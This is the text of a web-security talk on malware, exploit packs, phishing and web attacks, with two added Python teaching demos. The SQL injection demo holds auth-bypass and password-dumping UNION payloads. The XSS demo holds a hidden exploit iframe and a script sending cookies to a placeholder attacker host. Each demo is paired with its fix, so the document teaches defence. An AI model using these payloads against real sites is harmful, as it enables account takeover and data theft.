Davide “ocean” Quarta
Malicious web: a look into the dirty net
Something about me...
I'm a student, I'm mostly interested in malware/rootkit research, reverse engineering and the psychology of security. I also have some interest in algorithms and web application security. I have been programming since I was 14 (x86/Z80 asm programming and C).
Presented other papers at Italian IT events.
Proud member of the EvilFingers group, I write for the team's blog: http://evilfingers.blogspot.com/
My blog: http://www.inseclab.netsons.org
What are we doing here?
IT Security!!! Home Users, Governments, Businesses
IT Security
A few questions:
● Why must we defend ourselves?
● From whom/what?
Replies from the public? :)
Home Users, Governments, Businesses?
What if we were the bad guys?
●Crimeware based organizations
●Scareware companies
●Skilled individuals/teams
●Ex-employees
●Other companies
●Adverse governments
What's the gain?
Web Threats
● Malware, Cybercrime, Crimeware
● Exploit Packs
● SQL Injection, XSS, RCE, RFI
● 0Day
● Buffer Overflow, Null pointer dereference
● Scareware, Identity Theft, Fraud
Malware/Scareware/Crimeware
●Malware: software created to be installed and to carry on its activities without the user's informed consent.
●Scareware: scam software that frightens the user into believing something is wrong and paying for a fake service.
●Crimeware: malware created with the intent of automating cybercrime. Used for identity theft and to get access to sensitive data such as banking accounts.
SQLi, RCE, BOF...
●SQL Injection: insufficient checks on user input that is embedded in SQL queries let an attacker alter the query itself, so they can read or modify the database and, depending on the DBMS and the privileges it runs with, execute code on the server.
●RCE: Remote Code Execution, the attacker runs code of their choosing on the target system.
●Buffer Overflow: the length of input buffers is not checked; high risk of DoS or of RCE/LPE (local privilege escalation).
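The SQL injection bullet above, as an added example that is not part of the original slides: a login query built by string concatenation next to the same query parameterized, run against an in-memory SQLite database with constructed users. The table, the two payloads and the hostnames are all made up for the demo; the technique is the same on any SQL backend.

```python
"""Added example (not from the original slides): SQL injection by string
concatenation versus a parameterized query, using the standard library."""
import sqlite3


def make_db() -> sqlite3.Connection:
    """In-memory database with constructed sample users (not real data)."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (name TEXT, password TEXT, role TEXT)")
    conn.executemany(
        "INSERT INTO users VALUES (?, ?, ?)",
        [("alice", "s3cret", "admin"), ("bob", "hunter2", "user")],
    )
    return conn


def login_vulnerable(conn, name, password):
    """Insufficient check: user input is pasted into the SQL text, so a quote
    in the input ends the string literal and the rest is parsed as SQL."""
    query = (
        "SELECT name, role FROM users "
        "WHERE name = '%s' AND password = '%s'" % (name, password)
    )
    return conn.execute(query).fetchall()


def login_safe(conn, name, password):
    """Parameterized query: the DBMS receives the query structure and the
    values separately, so whatever the input contains is only ever compared
    as data and can never change the query."""
    query = "SELECT name, role FROM users WHERE name = ? AND password = ?"
    return conn.execute(query, (name, password)).fetchall()


# Constructed payloads. AUTH_BYPASS turns the WHERE clause into
#   name = 'x' AND password = '' OR '1'='1'   (true for every row).
# EXFIL closes the clause, UNIONs in a second SELECT with the same column
# count and comments out the trailing quote, leaking every password.
AUTH_BYPASS = "' OR '1'='1"
EXFIL = "' UNION SELECT name, password FROM users --"

if __name__ == "__main__":
    db = make_db()
    print(login_vulnerable(db, "alice", "s3cret"))  # legitimate login
    print(login_vulnerable(db, "x", AUTH_BYPASS))   # both rows: auth bypassed
    print(login_vulnerable(db, "x", EXFIL))         # names and passwords leaked
    print(login_safe(db, "x", AUTH_BYPASS))         # []: payload is just a string
    print(login_safe(db, "x", EXFIL))               # []
```

The practical lesson is in the last two lines: the fix is not to filter quotes but to stop building queries from strings at all. Whether an injection escalates to code execution depends on what the database account is allowed to do (writing files, calling OS-level stored procedures), which is why the database user for a web application should have the least privilege it can work with.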
XSS, RFI
●XSS: Cross Site Scripting, unverified input is reflected into a page and runs as script in the victim's browser; used to insert external frames (for example an iframe pointing at an exploit page) or to steal session information.
●RFI: Remote File Inclusion, a script includes a file whose path is taken from user input, so the attacker can make it load and run code from a remote server.
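The XSS bullet above, as an added example that is not part of the original slides: a page that reflects a search term without encoding next to the same page with context-appropriate HTML escaping, exercised with the two abuses the slide names (an injected hidden iframe and a cookie-stealing script) plus an attribute break-out. The template, the payloads and the hostnames are constructed for the demo.

```python
"""Added example (not from the original slides): reflected XSS versus
output encoding, using only the standard library."""
import html
import re

# Constructed page template: the search term lands in two contexts, HTML
# text and a double-quoted attribute value.
TEMPLATE = (
    "<html><body><p>Results for: {term}</p>"
    '<input name="q" value="{term}"></body></html>'
)


def render_vulnerable(term: str) -> str:
    """Unverified input is copied into the page; any markup in it becomes
    part of the DOM and runs in the victim's browser."""
    return TEMPLATE.format(term=term)


def render_safe(term: str) -> str:
    """Encode for the HTML text and attribute contexts: < > & become
    entities and, with quote=True, so do the quote characters that would
    otherwise let input break out of the value="..." attribute."""
    return TEMPLATE.format(term=html.escape(term, quote=True))


# Constructed payloads (placeholder hostnames): the hidden frame an exploit
# pack would use to load its landing page, a cookie exfiltration script,
# and an attribute break-out that needs no < at all.
IFRAME_PAYLOAD = (
    '<iframe src="http://exploit.example/landing" width="0" height="0"></iframe>'
)
COOKIE_PAYLOAD = (
    '<script>new Image().src="http://evil.example/c?"+document.cookie</script>'
)
ATTR_PAYLOAD = '" onfocus="alert(document.cookie)" autofocus="'

ACTIVE_TAG = re.compile(r"<(script|iframe)\b", re.IGNORECASE)


def has_injected_tag(page: str) -> bool:
    """Crude check used only to compare the two renderings: does a raw
    <script> or <iframe> start tag survive in the output?"""
    return ACTIVE_TAG.search(page) is not None


if __name__ == "__main__":
    for payload in (IFRAME_PAYLOAD, COOKIE_PAYLOAD, ATTR_PAYLOAD):
        print("vulnerable:", render_vulnerable(payload))
        print("safe:      ", render_safe(payload))
```

Note that the third payload never uses `<`, so a filter that only strips tags would miss it; escaping has to match the context the data lands in (HTML text, attribute value, and differently again inside JavaScript or a URL). Marking session cookies HttpOnly limits what a successful injection can read, but does not stop the injected frame.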
0Day
Exploiting applications through unknown/unpatched software vulnerabilities.
Exploit Packs
●Web-based malware kits
●Mostly coded in PHP
●Serve web pages carrying exploits that install malware on the visitor's machine
●Produced by individuals or teams
●Price $100-$3000
●Some information on the EvilFingers blog (thanks to Jorge Mieres):
● http://evilfingers.blogspot.com/2009/08/prices-of-russian-crimeware-part-2.html
● http://evilfingers.blogspot.com/2009/06/trade-russian-version-of-private.html
● http://evilfingers.blogspot.com/2009/03/russian-prices-of-crimware.html
Exploit Packs
●Most used vulnerabilities:
● PDF exploits
● ActiveX exploits
● Browser plugin/component exploits
●Used by crimeware organizations to deploy large-scale malware infections
●A large-scale malware infection is most effective in its first weeks of activity
Latest Exploit Packs
●Produce statistics about usage/infections
●Selection of which countries to infect
Social Engineering
● Tricks, deception, manipulation of people
● Goal: get the victim to divulge sensitive/confidential data or to perform actions
● Related crimes: Fraud, Scam, Phishing, Carding, Identity Theft
Phishing
Criminally gaining access to sensitive information by posing as a trustworthy entity in an electronic transaction.
Usernames/passwords, bank account details, credit card details...
Scam/Carding/Identity Theft
●Scam: fraud perpetrated using social engineering techniques. Also called a "confidence trick".
●Carding: theft/fraud using stolen credit card data
●Identity theft: stealing identities to steal money or gain other benefits
RBN
RBN (Russian Business Network) is an organization which offers bullet-proof hosting to a lot of cybercrime activities:
● Delivery of exploits
● Identity Theft
● CP
● Malware
● Phishing
● Cybercrime
● Spam
Under the hood: skilled enough?
If you have enough skills/resources you can also sell other services on the black market:
● Custom rootkits
● Custom malware
● Custom PE packers/crypters
● Malware with custom AV/VM evasion techniques
● Malware that scans for known vulnerabilities
● 0Day vulnerabilities
Fight back!
One important thing is the attacker's profile: analyzing it gives us important information about who they are and the techniques they use.
Doing proactive security also means informing people. Security starts from people (employees, home users, professionals...).
Audit/pentest your networks and products.
Keep your systems updated and a little more secure with some good network security products.
Fight back!
Is there any good product to use for our network security?
...It's out of the scope of this presentation to say :)
Security researchers are doing a good job, but I think that the best results can be achieved with community-driven efforts.
Conclusions
Questions?
Thanks to...
This presentation is dedicated to the people without whom I wouldn't be the nice person I am: my parents and family, two really good friends of mine, Jesus :)
Thanks to my friends in real life and webspace, including but not limited to: Evilcry, Emdel, C0sm4ky, Nex, Omni, Alby, Raistlin, Pincopall, Zairon, everyone at EvilFingers and Malware Domains List.
Thanks also to my friends irl.
Thanks also to you for being here today!